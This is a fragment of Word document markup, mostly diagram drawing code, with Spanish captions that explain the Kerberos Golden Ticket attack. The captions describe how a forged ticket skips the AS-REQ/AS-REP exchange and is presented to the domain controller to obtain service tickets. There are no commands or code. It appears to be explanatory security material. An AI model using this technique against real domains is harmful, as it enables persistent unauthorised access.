                                <a:lnTo>
                                  <a:pt x="715263" y="276860"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="664463" y="276860"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="664463" y="264160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="715263" y="264160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="651763" y="232410"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="728345" h="308610">
                                <a:moveTo>
                                  <a:pt x="357632" y="6350"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="357632" y="276860"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="651763" y="276860"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="651763" y="270510"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370332" y="270510"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="363982" y="264160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370332" y="264160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370332" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="363982" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357632" y="6350"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="728345" h="308610">
                                <a:moveTo>
                                  <a:pt x="715263" y="264160"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="664463" y="264160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="664463" y="276860"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="715263" y="276860"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="727963" y="270510"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="715263" y="264160"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="728345" h="308610">
                                <a:moveTo>
                                  <a:pt x="370332" y="264160"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="363982" y="264160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370332" y="270510"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370332" y="264160"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="728345" h="308610">
                                <a:moveTo>
                                  <a:pt x="651763" y="264160"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="370332" y="264160"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370332" y="270510"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="651763" y="270510"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="651763" y="264160"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="728345" h="308610">
                                <a:moveTo>
                                  <a:pt x="370332" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357632" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="357632" y="6350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370332" y="6350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370332" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="728345" h="308610">
                                <a:moveTo>
                                  <a:pt x="370332" y="6350"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="357632" y="6350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="363982" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370332" y="12700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370332" y="6350"/>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23C82E5D" id="Group 541" o:spid="_x0000_s1026" style="position:absolute;margin-left:19.55pt;margin-top:1.45pt;width:802.35pt;height:512.9pt;z-index:-17885184;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="101898,6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10;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">
                <v:shape id="Image 542" o:spid="_x0000_s1027" type="#_x0000_t75" style="position:absolute;left:15059;width:86838;height:6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">
                  <v:imagedata r:id="rId71" o:title=""/>
                </v:shape>
                <v:shape id="Image 543" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:36012;top:1913;width:50247;height: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">
                  <v:imagedata r:id="rId284" o:title=""/>
                </v:shape>
                <v:shape id="Graphic 544" o:spid="_x0000_s1029" style="position:absolute;left:41333;top:47061;width:39338;height:762;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3933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" path="m3857625,r,76200l3921125,44450r-50800,l3870325,31750r50800,l3857625,xem3857625,31750l,31750,,44450r3857625,l3857625,31750xem3921125,31750r-50800,l3870325,44450r50800,l3933825,38100r-12700,-6350xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 545" o:spid="_x0000_s1030" style="position:absolute;left:37579;top:27835;width:18662;height:18168;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1866264,181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" path="m1412367,81280r-6376,-20066l1386586,r-49530,69342l1365288,73825r-4229,26886l1352296,151638r-9132,48653l1331404,255638r-11252,47384l1320025,303415r-140,610l1305966,354609r-15456,49365l1273098,452005r13,153l1253083,500888r-23012,48475l1204226,597192r-76,266l1190117,621030r-14491,22898l1159154,668197r-127,242l1123670,716026r-37871,45161l1065161,783602r-76,191l1045908,803503r-2807,2756l1042974,806386r-22656,22289l996086,851039r-114,178l945464,894981r-31242,25248l861314,960755r-64161,46062l738124,1046480r-32512,21209l638429,1109853r-34544,20828l535787,1170851r-67500,38468l386588,1254506r-152400,81661l,1457579r8636,17018l243078,1352931r152654,-81661l470027,1230122r72898,-41402l613664,1147064r34671,-20955l682371,1105027r33528,-21209l748538,1062482r32131,-21463l812165,1019556r60452,-43434l929767,932180r53721,-44450l1033272,842645r45720,-45962l1120394,750189r37211,-47244l1191006,655193r29718,-48387l1247013,558038r23368,-49403l1290828,458851r18161,-50038l1324610,358521r13970,-50546l1350645,257048r10795,-50927l1370965,155067r8763,-51181l1384058,76796r28309,4484xem1866125,489204r-241,-31750l1864766,426161r-25,-838l1862874,393954r-38,-762l1860257,362077r-88,-1143l1857108,329946r-114,-1270l1844040,231521r-10541,-65024l1821815,101346,1809750,36195r-12446,2286l1809369,103632r11557,64897l1831467,233426r9017,64516l1844294,329946r3175,30988l1847596,362077r2476,31115l1850136,393954r1866,31369l1852041,426161r1130,31039l1853425,489204r-495,31115l1851431,551230r-2667,31471l1848827,582942r-3644,30595l1840560,643077r-6122,31724l1834438,675030r-15697,60046l1798193,792873r-13615,31230l1784464,824382r-30226,57569l1717167,938618r-22124,29274l1694700,968349r-23266,27648l1646542,1023239r-27280,27203l1619161,1050607r-58027,51892l1525778,1130808r-34113,25806l1454404,1183132r-38354,25908l1376299,1234567r-41402,25273l1291971,1284986r-39002,22085l1252804,1307160r-54318,29413l1149959,1361884r-42773,21781l1057910,1407795r-50292,24003l956310,1455674r-52324,23749l850646,1503045r-108839,46863l630047,1596390r-178855,71945l177520,1774825r-11404,-29591l108712,1808226r84836,8128l183896,1791335r-1791,-4611l463042,1677289r171831,-69088l746760,1561719r108966,-46990l961517,1467231r51435,-23876l1063371,1419225r49403,-24257l1161034,1370457r47117,-24638l1253871,1321054r19672,-11075l1298321,1296035r43053,-25273l1383030,1245362r40005,-25654l1461516,1193673r36957,-26289l1533525,1140841r33401,-26670l1578267,1104430r20155,-17310l1628013,1059688r27813,-27686l1705102,975614r41656,-57658l1781302,859282r27940,-59690l1830832,739013r16002,-61468l1857756,615315r6223,-62865l1865503,520827r622,-31623xe" fillcolor="#ec7c30" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 546" o:spid="_x0000_s1031" style="position:absolute;left:68475;top:20121;width:20536;height:20282;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2053589,202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" path="m74838,30448l71198,42617r205915,61522l551179,188849r133604,43307l815339,276225r126746,44958l1064513,367411r117475,47625l1238757,439293r55245,24638l1347724,489076r52215,25606l1450212,540512r50692,27794l1545731,594070r43895,26903l1632177,648838r41682,29088l1711340,706189r36216,29554l1782890,767014r31367,30865l1814496,798011r28908,31299l1870202,861568r24510,32639l1916251,926453r20145,33666l1955801,997042r15927,34719l1997756,1101901r19231,71578l2017606,1176195r82,196l2024574,1211607r6244,39857l2030856,1251708r102,652l2038153,1327785r1699,39369l2040379,1407033r-630,39496l2038002,1486022r-2700,40899l2031619,1567434r-4445,40894l2021839,1649349r-5841,41275l2009266,1732026r-6985,41529l1987093,1855474r-17196,85594l1952625,2025142r12446,2540l1982342,1943608r16891,-84074l2014727,1775714r7112,-41656l2028571,1692529r5841,-41402l2039747,1609852r4572,-41021l2047875,1527937r2794,-40513l2052447,1447038r634,-40005l2052581,1367774r-7,-620l2050972,1328967r-3008,-39155l2043429,1249807r-5944,-38200l2030095,1173479r-9144,-37465l2010155,1098803r-12573,-36576l1983104,1026160r-16382,-35687l1948306,955421r-20447,-34418l1905127,886968r-24893,-33274l1853056,821054r-29591,-32003l1791461,757682r-34416,-30607l1720341,697102r-38989,-29337l1640331,638937r-43179,-28194l1552066,583184r-47116,-27178l1456181,529336r-50546,-26036l1353311,477647r-53975,-25147l1243964,427609r-57023,-24258l1069212,355600,946530,309245,819530,264160,688848,220090,554989,176784,280797,91948,74838,30448xem1782890,767014r-138,l1784234,768331r-1344,-1317xem83947,l,14732,62102,73025,71198,42617,59054,38988,62610,26797r13321,l83947,xem62610,26797l59054,38988r12144,3629l74838,30448,62610,26797xem75931,26797r-13321,l74838,30448r1093,-3651xe" fillcolor="black" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 547" o:spid="_x0000_s1032" style="position:absolute;left:63;top:21457;width:29312;height:7379;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2931160,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" path="m2930652,l,,,737615r2930652,l2930652,xe" fillcolor="#e7e6e6" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 548" o:spid="_x0000_s1033" style="position:absolute;left:63;top:21457;width:29312;height:7379;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2931160,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" path="m,737615r2930652,l2930652,,,,,737615xe" filled="f" strokecolor="#4471c4" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 549" o:spid="_x0000_s1034" style="position:absolute;left:42324;top:30967;width:19602;height:13462;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1960245,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" path="m1014984,l,,,830580r1014984,l1014984,xem1959864,883920r-1289304,l670560,1345692r1289304,l1959864,883920xe" fillcolor="#ec7c30" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 550" o:spid="_x0000_s1035" style="position:absolute;left:49029;top:39806;width:12897;height:4623;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="128968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" path="m,461772r1289303,l1289303,,,,,461772xe" filled="f" strokecolor="#4471c4" strokeweight="1pt">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 551" o:spid="_x0000_s1036" style="position:absolute;left:28319;top:17222;width:24009;height:22885;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2400935,2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" path="m1030522,965595r56117,-53000l1142455,860610r55449,-50923l1252921,759871r54520,-48664l1361398,663742r53330,-46222l1467365,572589r51879,-43597l1570300,486777r50167,-40788l1669681,406674r48194,-37798l1764986,332643r45961,-34624l1855694,265051r43467,-31267l1941284,204264r40712,-27727l2021233,150647r37696,-24005l2095020,104566r34419,-20100l2193005,50375r56099,-25642l2297216,7908,2336817,264,2353264,r14124,2167l2399155,35569r1459,14217l2399529,66201r-9611,39176l2370714,152593r-28408,54754l2305087,269134r-21792,33375l2259447,337454r-25856,36451l2205776,411801r-29725,39278l2144466,491674r-33398,41851l2075907,576569r-36875,44174l2000491,665984r-40158,46244l1918607,759414r-43244,48064l1830648,856358r-46136,49632l1737003,956312r-48832,50948l1638064,1058772r-51332,52014l1534222,1163237r-53638,52827l1425867,1269203r-55747,53389l1314002,1375602r-55816,51995l1202737,1478529r-55017,49825l1093200,1577026r-53957,47473l985913,1670727r-52637,44938l881397,1759267r-51056,42220l780174,1842279r-49213,39320l682766,1919399r-47111,36236l589694,1990260r-44747,32970l501480,2054497r-42123,29521l418645,2111744r-39237,25889l341712,2161636r-36090,22073l271202,2203806r-63566,34084l151537,2263520r-48111,16813l63824,2287961r-16447,256l33253,2286040,1467,2252618,,2238403r1078,-16414l10678,2182819r19198,-47210l58279,2080862r37219,-61781l117290,1985710r23850,-34941l166997,1914321r27817,-37893l224541,1837154r31588,-40593l289530,1754712r35164,-43042l361573,1667498r38545,-45239l440279,1576015r41729,-47186l525256,1480764r44719,-48881l616114,1382248r47512,-50324l712461,1280971r50109,-51517l813905,1177435r52512,-52458l920056,1072142r54718,-53148l1030522,965595xe" filled="f" strokecolor="#2e528f" strokeweight="1pt">
                  <v:stroke dashstyle="longDashDot"/>
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Graphic 552" o:spid="_x0000_s1037" style="position:absolute;left:29888;top:24762;width:7283;height:3086;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="72834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" path="m651763,232410r,76200l715263,276860r-50800,l664463,264160r50800,l651763,232410xem357632,6350r,270510l651763,276860r,-6350l370332,270510r-6350,-6350l370332,264160r,-251460l363982,12700,357632,6350xem715263,264160r-50800,l664463,276860r50800,l727963,270510r-12700,-6350xem370332,264160r-6350,l370332,270510r,-6350xem651763,264160r-281431,l370332,270510r281431,l651763,264160xem370332,l,,,12700r357632,l357632,6350r12700,l370332,xem370332,6350r-12700,l363982,12700r6350,l370332,6350xe" fillcolor="#4471c4" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9A9959" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F9DBA7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="206C53F0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76DCCF7D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1010DC2F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DBAE98" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13C5EDEA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B44E4AE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D05A34F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="42"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C56B4BD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="497" w:right="14281"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15846400" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2494BD70" wp14:editId="7934436E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>7917180</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>629431</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2903220" cy="460375"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>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460375"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6D1A50E1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="58" w:line="291" w:lineRule="exact"/>
                              <w:ind w:right="3"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>8. Otras solicitudes de validación opcionales con</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="259DC1E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="291" w:lineRule="exact"/>
                              <w:ind w:left="3" w:right="3"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>se realiza el DC.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2494BD70" id="Textbox 553" o:spid="_x0000_s1283" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:623.4pt;margin-top:49.55pt;width:228.6pt;height:36.25pt;z-index:1584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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6D1A50E1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="58" w:line="291" w:lineRule="exact"/>
                        <w:ind w:right="3"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>8. Otras solicitudes de validación opcionales con</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="259DC1E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="291" w:lineRule="exact"/>
                        <w:ind w:left="3" w:right="3"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>se realiza el DC.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>No existe comunicación AS-REQ o AS-REP con el DC. El Boleto Dorado se envía al DC para obtener un TGS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1560827E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327AC85B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B6527D2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62B5782E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D07532" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="662CDC00" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="130"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6200C7DC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="8490" w:right="8562" w:hanging="142"/>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15845888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="650BD9AE" wp14:editId="12AAD8D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4480559</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-931585</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1015365" cy="830580"/>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365" cy="830580"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="58E0B4B1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="181" w:firstLine="88"/>
                              <w:rPr>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>5. Presentar TGT, solicitud TGS (TGS-</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3F80DEAA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="291" w:lineRule="exact"/>
                              <w:ind w:left="551"/>
                              <w:rPr>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:spacing w:val="-4"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>REQ)</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="650BD9AE" id="Textbox 554" o:spid="_x0000_s1284" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:352.8pt;margin-top:-73.35pt;width:79.95pt;height:65.4pt;z-index:1584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" filled="f" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="58E0B4B1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="181" w:firstLine="88"/>
                        <w:rPr>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>5. Presentar TGT, solicitud TGS (TGS-</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3F80DEAA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="291" w:lineRule="exact"/>
                        <w:ind w:left="551"/>
                        <w:rPr>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:spacing w:val="-4"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>REQ)</w:t>
                      </w:r>
                    </w:p>
